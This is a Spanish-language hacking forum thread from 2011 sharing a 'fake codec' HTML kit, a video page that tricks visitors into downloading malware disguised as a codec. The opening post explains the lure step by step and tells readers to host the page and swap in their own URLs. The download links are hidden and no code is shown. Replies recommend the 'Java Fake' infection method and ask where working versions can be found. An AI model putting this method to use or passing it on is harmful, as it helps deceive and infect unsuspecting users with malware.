comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Codecs fake web en HTML

  • 9 Respuestas
  • 4248 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Stiuvert

  • *
  • Colaborador
  • *
  • Mensajes: 2668
  • Actividad:
    1.67%
  • Reputación 14
    • Ver Perfil
  • Skype: stiuvert@gmail.com
  • Twitter: @Stiuvert
« en: Abril 29, 2011, 02:28:59 pm »
Bueno, pues os dejo esta herramienta porque me parece muy muy interesante y util, es de troyanosyvirus.com.ar.

Esto basicamente es un simple html que contiene un video, y para ver dicho video requiere descargarse un codec, se usa para infectar con cualquier malware.

Funciona de la siguiente manera:
1-El usuario ingresa en la web fake para ver un video..
2-Para ver el video se requiere la descarga de un archivo entonces el usuario puede o no proceder a descargar el "codec", si no lo descarga no pasara nada, ni podra ver el video.
3-Si el usuario instala ese "codec" quedara infectado y podra ver el video sin problemas para que no haya sospechas.

Es un metodo utilizado por los "spammers" para infectar de forma masiva, y no es nada novedoso pero nunca esta de mas postearlo.





El archivo fake.html se puede subir a cualquier host, se le puede cambiar el nombre o modificarlo completo a gusto de cada uno. Las imagenes se encuentran en la carpeta commons, y ya estan alojadas en imageshack.us asi que no es nesesario subirlas.

Se debe modificar las URL siguiente con el bloc de notas u otro editor:


No tienes permisos para ver links. Registrate o Entra con tu cuenta

Y opcionales:

No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

¿Recomendación?
No descarguen códecs de webs que no sean conocidas y menos si su extension es .exe jaja...

Descarga:
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Xt3mP

  • *
  • Underc0der
  • Mensajes: 432
  • Actividad:
    0%
  • Reputación 0
  • Ellos me están buscando, pero yo los encontraré.
    • MSN Messenger - Xt3mP@h4x0rz.us
    • AOL Instant Messenger - Xt3mP@h4x0rz.us
    • Yahoo Instant Messenger - Xt3mP@h4x0rz.us
    • Ver Perfil
    • Xt3mP
« Respuesta #1 en: Abril 29, 2011, 07:36:57 pm »
Este método es demasiado viejo, aún lo recuerdo, pero no esta demás descargarlo, se agradece.
Cada vez que me das Karma me motivas

Desconectado chapinhack

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Mayo 01, 2011, 03:23:56 pm »
Man este metodo lo use hace como 4 años y aun funciona es solo de saber meter un poco de ingeniera social.

Desconectado Xt3mP

  • *
  • Underc0der
  • Mensajes: 432
  • Actividad:
    0%
  • Reputación 0
  • Ellos me están buscando, pero yo los encontraré.
    • MSN Messenger - Xt3mP@h4x0rz.us
    • AOL Instant Messenger - Xt3mP@h4x0rz.us
    • Yahoo Instant Messenger - Xt3mP@h4x0rz.us
    • Ver Perfil
    • Xt3mP
« Respuesta #3 en: Mayo 01, 2011, 09:32:07 pm »
Exácto, pero en estos casos preferiría más el Java Fake, al menos a mi punto de vista es mas eficaz.
Cada vez que me das Karma me motivas

Desconectado Stiuvert

  • *
  • Colaborador
  • *
  • Mensajes: 2668
  • Actividad:
    1.67%
  • Reputación 14
    • Ver Perfil
  • Skype: stiuvert@gmail.com
  • Twitter: @Stiuvert
« Respuesta #4 en: Mayo 02, 2011, 04:14:13 am »
Sí, yo también lo prefiero... Pero no esta de mas postearlo para saber que hay más alternativas.



Saludos

Desconectado chapinhack

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Mayo 02, 2011, 03:22:43 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Exácto, pero en estos casos preferiría más el Java Fake, al menos a mi punto de vista es mas eficaz.

Donde esta el java fake que hablas?

Desconectado Stiuvert

  • *
  • Colaborador
  • *
  • Mensajes: 2668
  • Actividad:
    1.67%
  • Reputación 14
    • Ver Perfil
  • Skype: stiuvert@gmail.com
  • Twitter: @Stiuvert
« Respuesta #6 en: Mayo 02, 2011, 03:28:00 pm »
Si buscas en Google "Infectar por Java Fake" o "Certificado Fake Java" obtendrás más de una búsqueda  :D

Desconectado Xt3mP

  • *
  • Underc0der
  • Mensajes: 432
  • Actividad:
    0%
  • Reputación 0
  • Ellos me están buscando, pero yo los encontraré.
    • MSN Messenger - Xt3mP@h4x0rz.us
    • AOL Instant Messenger - Xt3mP@h4x0rz.us
    • Yahoo Instant Messenger - Xt3mP@h4x0rz.us
    • Ver Perfil
    • Xt3mP
« Respuesta #7 en: Mayo 02, 2011, 09:07:21 pm »
Aquí en el foro hay uno:
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Cada vez que me das Karma me motivas

Desconectado chapinhack

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #8 en: Mayo 04, 2011, 08:03:05 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Aquí en el foro hay uno:
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Bueno segun dicen los que lo probaron que ese ya no funciona, alguien que conozca alguno funcional?

Desconectado Xt3mP

  • *
  • Underc0der
  • Mensajes: 432
  • Actividad:
    0%
  • Reputación 0
  • Ellos me están buscando, pero yo los encontraré.
    • MSN Messenger - Xt3mP@h4x0rz.us
    • AOL Instant Messenger - Xt3mP@h4x0rz.us
    • Yahoo Instant Messenger - Xt3mP@h4x0rz.us
    • Ver Perfil
    • Xt3mP
« Respuesta #9 en: Mayo 05, 2011, 01:24:51 am »
Claro que funciona, de hecho en No tienes permisos para ver links. Registrate o Entra con tu cuenta si entras te vota un Java Fake y te infectas, puedes entrar y darle cancelar para que mires que aún funciona, solo es cuestión de acomodar bien las cosas.
Cada vez que me das Karma me motivas

 

¿Te gustó el post? COMPARTILO!



HTML Injection (post para novatos)

Iniciado por Olger346

Respuestas: 1
Vistas: 1393
Último mensaje Diciembre 26, 2017, 11:37:27 am
por DLV
Obtener cuenta de Facebook con Enlace Fake

Iniciado por Stiuvert

Respuestas: 4
Vistas: 6265
Último mensaje Junio 15, 2012, 08:16:49 pm
por Stuxnet
Java Fake a una Red LAN [Infectando con Troyano en LAN]

Iniciado por Stiuvert

Respuestas: 4
Vistas: 4712
Último mensaje Julio 04, 2012, 11:35:57 pm
por x4r0r
Fake hotmail (By Aryenal)

Iniciado por Aryenal.Bt

Respuestas: 19
Vistas: 8704
Último mensaje Enero 18, 2013, 07:26:51 pm
por f3rnand0